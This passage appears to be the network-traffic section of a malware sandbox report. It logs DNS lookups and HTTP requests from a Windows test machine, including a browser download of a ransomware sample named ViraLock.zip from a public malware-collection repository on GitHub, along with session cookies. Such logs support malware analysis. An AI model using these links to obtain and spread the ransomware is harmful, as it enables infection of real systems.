                          access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
                          content-security-policy: default-src 'none'
                          vary: Accept-Encoding, Accept, X-Requested-With
                          server: github.com
                          x-github-request-id: C3F6:168503:E3998:1154B8:6797C1C6
                        • flag-gb
                          POST
                          https://api.github.com/_private/browser/stats
                          firefox.exe
                          Remote address:
                          20.26.156.210:443
                          Request
                          POST /_private/browser/stats HTTP/2.0
                          host: api.github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/ViraLock.zip
                          content-type: text/plain;charset=UTF-8
                          content-length: 312
                          origin: https://github.com
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          date: Mon, 27 Jan 2025 17:27:02 GMT
                          content-type: text/plain
                          content-length: 0
                          cache-control: no-cache
                          x-ratelimit-limit: 60
                          x-ratelimit-remaining: 60
                          x-ratelimit-reset: 1738002422
                          x-ratelimit-used: 0
                          x-ratelimit-resource: core
                          x-github-media-type: github.v3; format=json
                          x-github-api-version-selected: 2022-11-28
                          access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
                          content-security-policy: default-src 'none'
                          vary: Accept-Encoding, Accept, X-Requested-With
                          server: github.com
                          x-github-request-id: C3F6:168503:E40B1:115D55:6797C1D8
                        • flag-us
                          DNS
                          api.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          api.github.com
                          IN A
                          Response
                          api.github.com
                          IN A
                          20.26.156.210
                        • flag-us
                          DNS
                          api.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          api.github.com
                          IN A
                          Response
                          api.github.com
                          IN A
                          20.26.156.210
                        • flag-us
                          DNS
                          api.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          api.github.com
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          21.113.82.140.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          21.113.82.140.in-addr.arpa
                          IN PTR
                          Response
                          21.113.82.140.in-addr.arpa
                          IN PTR
                          lb-140-82-113-21-iadgithubcom
                        • flag-us
                          DNS
                          210.156.26.20.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          210.156.26.20.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          checkappexec.microsoft.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          checkappexec.microsoft.com
                          IN A
                          Response
                          checkappexec.microsoft.com
                          IN CNAME
                          prod-atm-wds-apprep.trafficmanager.net
                          prod-atm-wds-apprep.trafficmanager.net
                          IN CNAME
                          prod-agic-us-1.uksouth.cloudapp.azure.com
                          prod-agic-us-1.uksouth.cloudapp.azure.com
                          IN A
                          13.87.96.169
                        • flag-us
                          DNS
                          checkappexec.microsoft.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          checkappexec.microsoft.com
                          IN A
                          Response
                          checkappexec.microsoft.com
                          IN CNAME
                          prod-atm-wds-apprep.trafficmanager.net
                          prod-atm-wds-apprep.trafficmanager.net
                          IN CNAME
                          prod-agic-us-3.uksouth.cloudapp.azure.com
                          prod-agic-us-3.uksouth.cloudapp.azure.com
                          IN A
                          172.165.61.93
                        • flag-gb
                          POST
                          https://checkappexec.microsoft.com/windows/shell/actions
                          Remote address:
                          13.87.96.169:443
                          Request
                          POST /windows/shell/actions HTTP/2.0
                          host: checkappexec.microsoft.com
                          accept-encoding: gzip, deflate
                          user-agent: SmartScreen/2814751014982010
                          authorization: SmartScreenHash eyJhdXRoSWQiOiJhZGZmZjVhZC1lZjllLTQzYTYtYjFhMy0yYWQ0MjY3YWVlZDUiLCJoYXNoIjoiVXJndGIza00vWWM9Iiwia2V5IjoiaEVyaUcwMlBhUm9vNUd2d1pRZDVEZz09In0=
                          content-length: 1162
                          content-type: application/json; charset=utf-8
                          cache-control: no-cache
                          Response
                          HTTP/2.0 200
                          date: Mon, 27 Jan 2025 17:26:29 GMT
                          content-type: application/json; charset=utf-8
                          content-length: 183
                          server: Kestrel
                          cache-control: max-age=0, private
                          request-context: appId=cid-v1:7f05e9f0-1fe6-401c-8ae7-2478e40e2f1e
                        • flag-us
                          DNS
                          169.96.87.13.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          169.96.87.13.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          169.96.87.13.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          169.96.87.13.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          roaming.officeapps.live.com
                          EXCEL.EXE
                          Remote address:
                          8.8.8.8:53
                          Request
                          roaming.officeapps.live.com
                          IN A
                          Response
                          roaming.officeapps.live.com
                          IN CNAME
                          prod.roaming1.live.com.akadns.net
                          prod.roaming1.live.com.akadns.net
                          IN CNAME
                          eur.roaming1.live.com.akadns.net
                          eur.roaming1.live.com.akadns.net
                          IN CNAME
                          uks-azsc-000.roaming.officeapps.live.com
                          uks-azsc-000.roaming.officeapps.live.com
                          IN CNAME
                          osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com
                          osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com
                          IN A
                          52.109.28.47
                        • flag-us
                          DNS
                          46.28.109.52.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          46.28.109.52.in-addr.arpa
                          IN PTR
                          Response
                        • flag-gb
                          POST
                          https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
                          EXCEL.EXE
                          Remote address:
                          52.109.28.47:443
                          Request
                          POST /rs/RoamingSoapService.svc HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          Content-Type: text/xml; charset=utf-8
                          User-Agent: MS-WebServices/1.0
                          SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
                          Content-Length: 511
                          Host: roaming.officeapps.live.com
                          Response
                          HTTP/1.1 200 OK
                          Cache-Control: private
                          Content-Type: text/xml; charset=utf-8
                          Server: Microsoft-IIS/10.0
                          X-OfficeFE: RoamingFE_IN_580
                          X-OfficeVersion: 16.0.18517.30576
                          X-OfficeCluster: uks-000.roaming.officeapps.live.com
                          Content-Security-Policy-Report-Only: script-src 'nonce-8OenJ28nw705HpYgMBvofAwoxgPmVGMGojf+ubIsNZuiJ/EooKxPogiSM+T8h3mZzP0cALv/cqUeUCqrcXFSQwZckohiN0cfEuir+jXzLqPaD4TExWHZ9qK6qvk92p7TBzrG2wIpCHaeA1cWEVkXsV5kmwOG/qxRuyEV1V8K5Ik=' 'unsafe-inline' 'unsafe-eval' 'strict-dynamic' https:; base-uri 'self'; object-src 'none'; require-trusted-types-for 'script'; report-uri https://csp.microsoft.com/report/OfficeIce-OfficeRoaming-Prod; frame-ancestors 'none';
                          X-Frame-Options: Deny
                          X-CorrelationId: b2adf31e-905b-49b9-9c76-8000e64cd24c
                          X-Powered-By: ASP.NET
                          Date: Mon, 27 Jan 2025 17:26:29 GMT
                          Content-Length: 654
                        • flag-us
                          DNS
                          47.28.109.52.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          47.28.109.52.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          14.173.189.20.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          14.173.189.20.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          14.173.189.20.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          14.173.189.20.in-addr.arpa
                          IN PTR
                        • flag-us
                          DNS
                          github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.com
                          IN A
                          Response
                          github.com
                          IN A
                          20.26.156.215
                        • flag-us
                          DNS
                          github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.com
                          IN A
                          Response
                          github.com
                          IN A
                          20.26.156.215
                        • flag-us
                          DNS
                          github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.com
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          glb-db52c2cf8be544.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          glb-db52c2cf8be544.github.com
                          IN A
                          Response
                          glb-db52c2cf8be544.github.com
                          IN A
                          140.82.113.22
                        • flag-us
                          DNS
                          glb-db52c2cf8be544.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          glb-db52c2cf8be544.github.com
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          location.services.mozilla.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          location.services.mozilla.com
                          IN A
                          Response
                          location.services.mozilla.com
                          IN CNAME
                          prod.classify-client.prod.webservices.mozgcp.net
                          prod.classify-client.prod.webservices.mozgcp.net
                          IN A
                          35.190.72.216
                        • flag-us
                          DNS
                          prod.classify-client.prod.webservices.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          prod.classify-client.prod.webservices.mozgcp.net
                          IN A
                          Response
                          prod.classify-client.prod.webservices.mozgcp.net
                          IN A
                          35.190.72.216
                        • flag-us
                          DNS
                          prod.classify-client.prod.webservices.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          prod.classify-client.prod.webservices.mozgcp.net
                          IN A
                        • flag-us
                          DNS
                          prod.balrog.prod.cloudops.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          prod.balrog.prod.cloudops.mozgcp.net
                          IN AAAA
                          Response
                        • flag-us
                          GET
                          https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
                          firefox.exe
                          Remote address:
                          35.190.72.216:443
                          Request
                          GET /v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb HTTP/2.0
                          host: location.services.mozilla.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          content-type: application/json
                          te: trailers
                        • flag-us
                          DNS
                          prod.classify-client.prod.webservices.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          prod.classify-client.prod.webservices.mozgcp.net
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          prod.content-signature-chains.prod.webservices.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          prod.content-signature-chains.prod.webservices.mozgcp.net
                          IN AAAA
                          Response
                          prod.content-signature-chains.prod.webservices.mozgcp.net
                          IN AAAA
                          2600:1901:0:92a9::
                        • flag-us
                          DNS
                          redirector.gvt1.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          redirector.gvt1.com
                          IN A
                          Response
                          redirector.gvt1.com
                          IN A
                          66.102.1.113
                          redirector.gvt1.com
                          IN A
                          66.102.1.138
                          redirector.gvt1.com
                          IN A
                          66.102.1.101
                          redirector.gvt1.com
                          IN A
                          66.102.1.102
                          redirector.gvt1.com
                          IN A
                          66.102.1.139
                          redirector.gvt1.com
                          IN A
                          66.102.1.100
                        • flag-us
                          DNS
                          redirector.gvt1.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          redirector.gvt1.com
                          IN A
                          Response
                          redirector.gvt1.com
                          IN A
                          66.102.1.138
                          redirector.gvt1.com
                          IN A
                          66.102.1.102
                          redirector.gvt1.com
                          IN A
                          66.102.1.139
                          redirector.gvt1.com
                          IN A
                          66.102.1.101
                          redirector.gvt1.com
                          IN A
                          66.102.1.100
                          redirector.gvt1.com
                          IN A
                          66.102.1.113
                        • flag-us
                          DNS
                          ciscobinary.openh264.org
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          ciscobinary.openh264.org
                          IN A
                          Response
                          ciscobinary.openh264.org
                          IN CNAME
                          a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                          a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                          IN CNAME
                          a17.rackcdn.com
                          a17.rackcdn.com
                          IN CNAME
                          a17.rackcdn.com.mdc.edgesuite.net
                          a17.rackcdn.com.mdc.edgesuite.net
                          IN CNAME
                          a19.dscg10.akamai.net
                          a19.dscg10.akamai.net
                          IN A
                          23.200.86.251
                          a19.dscg10.akamai.net
                          IN A
                          23.200.87.12
                        • flag-be
                          GET
                          https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip
                          firefox.exe
                          Remote address:
                          66.102.1.113:443
                          Request
                          GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip HTTP/2.0
                          host: redirector.gvt1.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          te: trailers
                        • flag-us
                          DNS
                          redirector.gvt1.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          redirector.gvt1.com
                          IN A
                          Response
                          redirector.gvt1.com
                          IN A
                          66.102.1.139
                          redirector.gvt1.com
                          IN A
                          66.102.1.102
                          redirector.gvt1.com
                          IN A
                          66.102.1.113
                          redirector.gvt1.com
                          IN A
                          66.102.1.100
                          redirector.gvt1.com
                          IN A
                          66.102.1.138
                          redirector.gvt1.com
                          IN A
                          66.102.1.101
                        • flag-us
                          DNS
                          redirector.gvt1.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          redirector.gvt1.com
                          IN A
                          Response
                          redirector.gvt1.com
                          IN A
                          66.102.1.113
                          redirector.gvt1.com
                          IN A
                          66.102.1.102
                          redirector.gvt1.com
                          IN A
                          66.102.1.100
                          redirector.gvt1.com
                          IN A
                          66.102.1.139
                          redirector.gvt1.com
                          IN A
                          66.102.1.101
                          redirector.gvt1.com
                          IN A
                          66.102.1.138
                        • flag-fr
                          GET
                          http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip
                          firefox.exe
                          Remote address:
                          23.200.86.251:80
                          Request
                          GET /openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip HTTP/1.1
                          Host: ciscobinary.openh264.org
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          Accept: */*
                          Accept-Language: en-US,en;q=0.5
                          Accept-Encoding: gzip, deflate
                          Connection: keep-alive
                          Response
                          HTTP/1.1 200 OK
                          Last-Modified: Fri, 08 Nov 2024 02:37:54 GMT
                          ETag: 09372174e83dbbf696ee732fd2e875bb
                          Content-Length: 491284
                          Accept-Ranges: bytes
                          X-Timestamp: 1731033473.13891
                          Content-Type: application/zip
                          X-Trans-Id: tx512c8f486af34e6198a13-00672e5bcfdfw1
                          Cache-Control: public, max-age=28790
                          Expires: Tue, 28 Jan 2025 01:26:39 GMT
                          Date: Mon, 27 Jan 2025 17:26:49 GMT
                          Connection: keep-alive
                        • flag-us
                          DNS
                          a19.dscg10.akamai.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          a19.dscg10.akamai.net
                          IN A
                          Response
                          a19.dscg10.akamai.net
                          IN A
                          23.200.87.12
                          a19.dscg10.akamai.net
                          IN A
                          23.200.86.251
                        • flag-us
                          DNS
                          a19.dscg10.akamai.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          a19.dscg10.akamai.net
                          IN AAAA
                          Response
                          a19.dscg10.akamai.net
                          IN AAAA
                          2a02:26f0:a1::58dd:869b
                          a19.dscg10.akamai.net
                          IN AAAA
                          2a02:26f0:a1::58dd:86d1
                        • flag-us
                          DNS
                          redirector.gvt1.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          redirector.gvt1.com
                          IN AAAA
                          Response
                          redirector.gvt1.com
                          IN AAAA
                          2a00:1450:400c:c06::8a
                          redirector.gvt1.com
                          IN AAAA
                          2a00:1450:400c:c06::65
                          redirector.gvt1.com
                          IN AAAA
                          2a00:1450:400c:c06::8b
                          redirector.gvt1.com
                          IN AAAA
                          2a00:1450:400c:c06::71
                        • flag-us
                          DNS
                          r2---sn-5hnednss.gvt1.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          r2---sn-5hnednss.gvt1.com
                          IN A
                          Response
                          r2---sn-5hnednss.gvt1.com
                          IN CNAME
                          r2.sn-5hnednss.gvt1.com
                          r2.sn-5hnednss.gvt1.com
                          IN A
                          172.217.132.199
                        • flag-nl
                          GET
                          https://r2---sn-5hnednss.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1737998809,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-5hnednss&ms=nvh&mt=1737998413&mv=m&mvi=2&pl=25&rmhost=r3---sn-5hnednss.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-5hnekn7d.gvt1.com
                          firefox.exe
                          Remote address:
                          172.217.132.199:443
                          Request
                          GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1737998809,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-5hnednss&ms=nvh&mt=1737998413&mv=m&mvi=2&pl=25&rmhost=r3---sn-5hnednss.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-5hnekn7d.gvt1.com HTTP/1.1
                          Host: r2---sn-5hnednss.gvt1.com
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          Accept: */*
                          Accept-Language: en-US,en;q=0.5
                          Accept-Encoding: gzip, deflate, br
                          Connection: keep-alive
                          Response
                          HTTP/1.1 200 OK
                          Accept-Ranges: bytes
                          Cache-Control: public,max-age=86400
                          Content-Disposition: attachment
                          Content-Length: 14485862
                          Content-Security-Policy: default-src 'none'
                          Content-Type: application/zip
                          Etag: "1d3918c"
                          Server: downloads
                          X-Content-Type-Options: nosniff
                          X-Frame-Options: SAMEORIGIN
                          X-Xss-Protection: 0
                          Date: Mon, 27 Jan 2025 17:07:09 GMT
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                          Last-Modified: Thu, 05 Oct 2023 00:56:47 GMT
                          Connection: keep-alive
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,quic=":443"; ma=2592000; v="46"
                          Vary: Origin
                        • flag-us
                          DNS
                          r2.sn-5hnednss.gvt1.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          r2.sn-5hnednss.gvt1.com
                          IN A
                          Response
                          r2.sn-5hnednss.gvt1.com
                          IN A
                          172.217.132.199
                        • flag-us
                          DNS
                          r2.sn-5hnednss.gvt1.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          r2.sn-5hnednss.gvt1.com
                          IN A
                          Response
                          r2.sn-5hnednss.gvt1.com
                          IN A
                          172.217.132.199
                        • flag-us
                          DNS
                          r2.sn-5hnednss.gvt1.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          r2.sn-5hnednss.gvt1.com
                          IN AAAA
                          Response
                          r2.sn-5hnednss.gvt1.com
                          IN AAAA
                          2a00:1450:400e:1b::7
                        • flag-us
                          DNS
                          216.72.190.35.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          216.72.190.35.in-addr.arpa
                          IN PTR
                          Response
                          216.72.190.35.in-addr.arpa
                          IN PTR
                          2167219035bcgoogleusercontentcom
                        • flag-us
                          DNS
                          216.72.190.35.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          216.72.190.35.in-addr.arpa
                          IN PTR
                          Response
                          216.72.190.35.in-addr.arpa
                          IN PTR
                          2167219035bcgoogleusercontentcom
                        • flag-us
                          DNS
                          201.181.244.35.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          201.181.244.35.in-addr.arpa
                          IN PTR
                          Response
                          201.181.244.35.in-addr.arpa
                          IN PTR
                          20118124435bcgoogleusercontentcom
                        • flag-us
                          DNS
                          113.1.102.66.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          113.1.102.66.in-addr.arpa
                          IN PTR
                          Response
                          113.1.102.66.in-addr.arpa
                          IN PTR
                          wb-in-f1131e100net
                        • flag-us
                          DNS
                          251.86.200.23.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          251.86.200.23.in-addr.arpa
                          IN PTR
                          Response
                          251.86.200.23.in-addr.arpa
                          IN PTR
                          a23-200-86-251deploystaticakamaitechnologiescom
                        • flag-us
                          DNS
                          56.163.245.4.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          56.163.245.4.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          199.132.217.172.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          199.132.217.172.in-addr.arpa
                          IN PTR
                          Response
                          199.132.217.172.in-addr.arpa
                          IN PTR
                          ams16s33-in-f71e100net
                        • flag-us
                          DNS
                          15.164.165.52.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          15.164.165.52.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          15.164.165.52.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          15.164.165.52.in-addr.arpa
                          IN PTR
                        • flag-us
                          DNS
                          github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.com
                          IN A
                          Response
                          github.com
                          IN A
                          20.26.156.215
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/raw/refs/heads/master/ransomwares/ViraLock.zip
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/raw/refs/heads/master/ransomwares/ViraLock.zip HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/ViraLock.zip
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 302
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:27:46 GMT
                          content-type: text/html; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          access-control-allow-origin:
                          location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/refs/heads/master/ransomwares/ViraLock.zip
                          cache-control: no-cache
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-length: 0
                          x-github-request-id: C511:1D672B:183C7D:1C5141:6797C212
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/tree/master
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/tree/master HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/html, application/xhtml+xml, application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/ViraLock.zip
                          turbo-visit: true
                          x-react-app-name: react-code-view
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
